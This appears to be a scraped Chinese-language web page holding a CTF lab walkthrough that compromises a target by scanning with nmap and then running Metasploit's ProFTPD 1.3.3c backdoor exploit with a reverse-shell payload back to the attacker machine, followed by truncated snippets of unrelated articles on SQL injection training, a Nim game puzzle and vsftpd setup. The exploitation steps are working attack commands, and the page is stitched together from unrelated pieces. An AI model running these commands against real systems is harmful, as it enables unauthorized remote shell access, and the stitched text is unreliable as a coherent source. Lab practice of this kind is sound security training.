環境
ip:
攻擊機:192.168.36.128
靶機:192.168.36.139
提取碼:olrh
nmap -ss #掃瞄某個網段下存活的主機
nmap -sv #掃瞄目標ip的開放服務以及版本資訊
nmap -a -v t4 #掃瞄目標ip的全部資訊
searchsploit proftpd 1.3.3cmsfconsole #開啟msf
search proftpd 1.3.3c #搜尋該版本下的漏洞
use exploit/unix/ftp/proftpd_133c_backdoor#使用該漏洞
show payloads #檢視可以使用的payload
set payload cmd/unix/reverse#使用payload
show options #檢視需要設定的引數
set lhost 192.168.36.128#監聽(本機)ip
set rhost 192.168.36.139#靶機ip
run/exploit #執行exploit
python -c "import pty;pty.spawn('/bin/bash')" #優化終端
CTF奪旗賽培訓 Web應用安全
檢視我的個人部落格 培訓公司 安全狗 廈門服雲資訊科技 ps 演示環境dvwa sql注入就是通過把sql命令插入到web表單遞交或輸入網域名稱或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的sql命令。具體來說,是利用現有的應用程式,將 惡意 的sql命令注入到後台資料庫引擎執行的能力,它可以通...
2014攜程第二場1004 奪旗 Nim變形
小時候玩過一種小遊戲,奪旗。遊戲規則 共有n組旗子,每組旗子數量已知,兩個玩家輪流拔旗,每次只能選 某 一組,拔掉一定數量的旗子,至少需要拔乙個,拔掉旗子之後,還可以將該組旗子中餘下的任意多個旗子中 任選幾個放到其它的任意一組或幾組裡。一堆旗子被拔空後就不能再往此處插旗了。先無法拔旗的人為輸者。假設...
FTP介紹及使用vsftpd搭建ftp服務(上)
ftp file transfer protocol 檔案傳輸協議,用於在internet上控制檔案的雙向傳輸。ftp主要作用是讓使用者連線乙個遠端計算機 這些計算機上執行著ftp伺服器程式 檢視遠端計算機有哪些檔案,然後把檔案從遠端計算機上拷貝到本地計算機,或把本地檔案傳送到遠端計算機。該服務在小...